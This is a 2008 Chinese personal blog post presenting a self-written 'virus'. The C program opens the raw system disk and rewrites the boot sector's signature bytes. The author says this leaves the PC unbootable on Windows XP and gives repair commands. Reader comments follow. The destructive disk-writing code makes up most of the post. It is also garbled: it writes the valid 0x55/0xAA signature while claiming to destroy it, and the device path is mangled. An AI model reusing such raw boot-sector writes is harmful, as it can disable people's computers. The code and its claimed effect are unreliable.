自己写的病毒

by anyshpm on May.28, 2008, under 旅程

#include <io.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <errno.h>

int main()
{
int hand;
char mbrBuf[512];
char buf[100]={0};

sprintf(buf,”\.PhysicalDrive0“);
hand=open(buf,O_RDWR | O_BINARY,S_IREAD | S_IWRITE);
read(hand,mbrBuf,512);
mbrBuf[510]=0×55;
mbrBuf[511]=0xAA;
lseek(hand,0,SEEK_SET);
write(hand,mbrBuf,512);
close(hand);

return 0;
}
只是小小地破坏了一下主引导区的两个标志字节,结果是,电脑没法启动
大部分代码是从grubinst中学来的
这个程序在xp下可以很正常的运行,而在vista下由于权限不够导致出错

使用debug的int 13可以很方便的恢复那两个字节(0×55 0xAA),或者用fixmbr和fdisk /mbr也应该可以修复

您可能也关注于:

4 Comments for this entry

xFengChenx
May 29th, 2008 on 01:15
哦……那就是fdisk修复的主引导区与所装系统的引导程序不兼容吧，猜得……

Reply
鱼雷
May 29th, 2008 on 01:26
厉害

Reply
xFengChenx
May 29th, 2008 on 02:07
很好很强大……
用fixmbr肯定可以，fdisk /mbr应该也行（不知道会不会有大硬盘不支持的问题，fdisk好老了的说……）

传说中的55AA破坏法，呵呵。

Reply
anyshpm
May 29th, 2008 on 09:45
"fdisk /mbr"可以修复那两个标志位,但是重启之后直接蓝屏

Reply

RSS feed for this post (comments) TrackBack URI

Hi! Welcome to 竹枝!
Thanks for dropping by! Feel free to join the discussion by leaving comments, and stay updated by subscribing to the RSS feed. See ya around!
Frequent Pages
- 弹钢琴
- 留言板
My tweets
- 不要让加班成为习惯 10 hrs ago
- 我正在看：Bill Consoles Steve About Jailbreaking http://fl5.me/6cc315 1 day ago
- 好大好圆的月亮啊 3 days ago
- 我正在看：谷歌问答 http://www.google.com.hk/wenda/ 3 days ago
- 失眠…… 4 days ago
- 一到周末在ChinaUnix开博的博主们集体停笔休息了？ 4 days ago
- “搞C的看不起搞C++的搞C++的看不起搞java的搞java的看不起高.net的搞.net的看不起搞js的搞js的看不起搞html的搞html的看不起美工. 最后美工周末去泡mm的时候, 一群傻X在那里加班” 4 days ago
- 我正在看：Taobao initiates Chinese open source revolution : ZDNet Asia Blogs : Open Source by Frederic Muller http://fl5.me/3gnbc0 5 days ago
- 残酷的现实总是与我美好的幻想形成鲜明对比[S & H / M] 5 days ago
- 好久没吃过泡面了，味道还不错 5 days ago
- More updates...
Posting tweet...
最新发表

Categories

Meta

竹枝